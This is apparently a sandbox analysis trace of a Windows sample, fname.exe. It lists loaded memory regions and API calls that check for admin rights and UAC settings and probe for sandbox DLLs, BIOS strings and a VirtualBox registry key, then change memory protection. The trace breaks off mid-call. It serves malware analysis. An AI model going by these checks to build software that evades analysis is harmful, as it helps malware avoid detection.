"kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3389 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3390 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3476 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3477 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3478 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3479 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3480 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3481 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3482 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3483 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 3484 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3485 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3486 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3487 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 3488 start_va = 0x14c0000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 3489 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3490 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3491 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3492 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3493 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3494 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3495 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3496 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3497 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3498 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3499 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3500 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3501 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3502 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3503 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3504 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3505 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3506 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3507 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3508 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3509 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3510 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3511 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3512 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3513 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3514 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3515 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3516 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3517 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3518 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3519 start_va = 0xac0000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3520 start_va = 0xad0000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3521 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3522 start_va = 0xae0000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3568 start_va = 0xae0000 end_va = 0xb01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3569 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Thread: id = 131 os_tid = 0xbe0 [0300.645] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74580000 [0300.653] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75640000 [0300.653] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74810000 [0301.086] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77830000 [0301.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75db0000 [0301.205] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x77680000 [0301.312] GetProcAddress (hModule=0x77830000, lpProcName="RtlEnterCriticalSection") returned 0x7786f290 [0301.312] GetProcAddress (hModule=0x77830000, lpProcName="RtlLeaveCriticalSection") returned 0x7786f210 [0301.324] GetProcAddress (hModule=0x77830000, lpProcName="RtlInitializeCriticalSection") returned 0x7788a200 [0301.390] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0301.391] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0301.469] GetUserDefaultUILanguage () returned 0x409 [0302.960] GetProcessHeap () returned 0x5a0000 [0302.960] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1000) returned 0x5af870 [0302.960] GetProcessHeap () returned 0x5a0000 [0302.960] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa5f0 [0303.156] GetProcessHeap () returned 0x5a0000 [0303.156] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x410) returned 0x5a9b90 [0303.167] GetProcessHeap () returned 0x5a0000 [0303.167] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa758 [0303.167] GetProcessHeap () returned 0x5a0000 [0303.167] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x410) returned 0x5b0878 [0303.167] GetProcessHeap () returned 0x5a0000 [0303.167] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa638 [0303.168] GetCurrentDirectoryW (in: nBufferLength=0x208, lpBuffer=0x5b0878 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0303.168] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a9b90, nSize=0x208 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\fname.exe")) returned 0x2e [0303.168] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0303.181] GetCurrentThreadId () returned 0xbe0 [0303.181] OpenThread (dwDesiredAccess=0x1f03ff, bInheritHandle=0, dwThreadId=0xbe0) returned 0x28 [0303.203] GetVersion () returned 0x295a000a [0303.304] GetCommandLineA () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe\" " [0303.439] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0303.440] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0304.252] GetCurrentThread () returned 0xfffffffe [0304.252] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x135d780 | out: TokenHandle=0x135d780*=0x0) returned 0 [0304.253] GetCurrentProcess () returned 0xffffffff [0304.253] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x135d780 | out: TokenHandle=0x135d780*=0x16c) returned 1 [0304.253] GetTokenInformation (in: TokenHandle=0x16c, TokenInformationClass=0x2, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1358b58 | out: TokenInformation=0x0, ReturnLength=0x1358b58) returned 0 [0304.253] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x1000, flProtect=0x4) returned 0x1e0000 [0304.254] GetTokenInformation (in: TokenHandle=0x16c, TokenInformationClass=0x2, TokenInformation=0x1e0000, TokenInformationLength=0x140, ReturnLength=0x1358b58 | out: TokenInformation=0x1e0000, ReturnLength=0x1358b58) returned 1 [0304.254] CloseHandle (hObject=0x16c) returned 1 [0304.254] AllocateAndInitializeSid (in: pIdentifierAuthority=0x135995c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x13618f4 | out: pSid=0x13618f4*=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0304.315] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e0074*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e007c*(Revision=0x15, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x65, [3]=0xa8, [4]=0xff, [5]=0x5c), SubAuthority=0xeddecfcf)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e0084*(Revision=0xcf, SubAuthorityCount=0xcf, IdentifierAuthority.Value=([0]=0xde, [1]=0xed, [2]=0x57, [3]=0xce, [4]=0xfc, [5]=0x6b), SubAuthority=([0]=0x1, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x1, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x1, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x1, [17]=0x1, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x5, [24]=0x72, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x2, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x5, [36]=0x20, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x20, [41]=0x2, [42]=0x0, [43]=0x0, [44]=0x1, [45]=0x2, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x5, [52]=0x20, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x21, [57]=0x2, [58]=0x0, [59]=0x0, [60]=0x1, [61]=0x1, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x5, [68]=0x4, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x1, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x2, [80]=0x1, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x1, [85]=0x1, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x5, [92]=0xb, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x1, [97]=0x1, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x5, [104]=0xf, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x1, [109]=0x1, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x5, [116]=0x71, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x1, [121]=0x3, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x5, [128]=0x5, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x14, [137]=0xfe, [138]=0x0, [139]=0x0, [140]=0x1, [141]=0x1, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x2, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x1, [153]=0x2, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x5, [160]=0x40, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0xa, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x1, [169]=0x1, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x10, [176]=0x0, [177]=0x30, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0))) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e008c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e0094*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e009c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x72)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00a4*(Revision=0x72, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00ac*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x220)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00b4*(Revision=0x20, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00bc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x221)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00c4*(Revision=0x21, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00cc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x4, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x1)) returned 0 [0304.337] EqualSid (pSid1=0x5aa578*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x1e00dc*(Revision=0x1, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0304.338] VirtualFree (lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0304.359] GetProcAddress (hModule=0x75db0000, lpProcName="IsUserAnAdmin") returned 0x7605db90 [0304.359] IsUserAnAdmin () returned 1 [0304.360] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x1358bbc | out: phkResult=0x1358bbc*=0x170) returned 0x0 [0304.361] RegQueryValueExA (in: hKey=0x170, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x0, lpData=0x135ba90, lpcbData=0x136218c*=0x4 | out: lpType=0x0, lpData=0x135ba90*=0x1, lpcbData=0x136218c*=0x4) returned 0x0 [0304.361] RegCloseKey (hKey=0x170) returned 0x0 [0304.400] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0304.400] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0304.474] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0x0, BufferSize=0x0 | out: pFirmwareTableBuffer=0x0) returned 0x4d3 [0304.475] GetProcessHeap () returned 0x5a0000 [0304.475] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4d3) returned 0x5b10c8 [0304.475] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0x5b10c8, BufferSize=0x4d3 | out: pFirmwareTableBuffer=0x5b10c8) returned 0x4d3 [0304.475] GetProcessHeap () returned 0x5a0000 [0304.476] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5b10c8) returned 1 [0304.508] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", phkResult=0x1361368 | out: phkResult=0x1361368*=0x170) returned 0x0 [0304.508] RegQueryValueExA (in: hKey=0x170, lpValueName="DriverDesc", lpReserved=0x0, lpType=0x0, lpData=0x135a3a4, lpcbData=0x135b2a8*=0x3a9181a7 | out: lpType=0x0, lpData=0x135a3a4*=0x4d, lpcbData=0x135b2a8*=0x20) returned 0x0 [0304.519] RegCloseKey (hKey=0x170) returned 0x0 [0304.519] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="Hardware\\description\\System", phkResult=0x1361368 | out: phkResult=0x1361368*=0x170) returned 0x0 [0304.520] RegQueryValueExA (in: hKey=0x170, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x135a3a4, lpcbData=0x135b2a8*=0x200 | out: lpType=0x0, lpData=0x135a3a4*=0x46, lpcbData=0x135b2a8*=0xc) returned 0x0 [0304.520] RegQueryValueExA (in: hKey=0x170, lpValueName="VideoBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x135a3a4, lpcbData=0x135b2a8*=0x200 | out: lpType=0x0, lpData=0x135a3a4*=0x46, lpcbData=0x135b2a8*=0x200) returned 0x2 [0304.520] RegQueryValueExA (in: hKey=0x170, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x135a3a4, lpcbData=0x135b2a8*=0x200 | out: lpType=0x0, lpData=0x135a3a4*=0x46, lpcbData=0x135b2a8*=0xc) returned 0x0 [0304.520] RegCloseKey (hKey=0x170) returned 0x0 [0304.520] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\ACPI\\DSDT\\VBOX__", phkResult=0x1361368 | out: phkResult=0x1361368*=0x0) returned 0x2 [0304.636] GetProcessHeap () returned 0x5a0000 [0304.636] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa650 [0304.636] GetProcessHeap () returned 0x5a0000 [0304.637] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa668 [0305.027] VirtualProtect (in: lpAddress=0x128bc24, dwSize=0x3c, flNewProtect=0x40, lpflOldProtect=0x13629b4 | out: lpflOldProtect=0x13629b4*=0x2) returned 1 [0305.027] VirtualProtect (in: lpAddress=0x126d000, dwSize=0x14c, flNewProtect=0x40, lpflOldProtect=0x135da98 | out: lpflOldProtect=0x135da98*=0x2) returned 1 [0305.028] VirtualProtect (in: 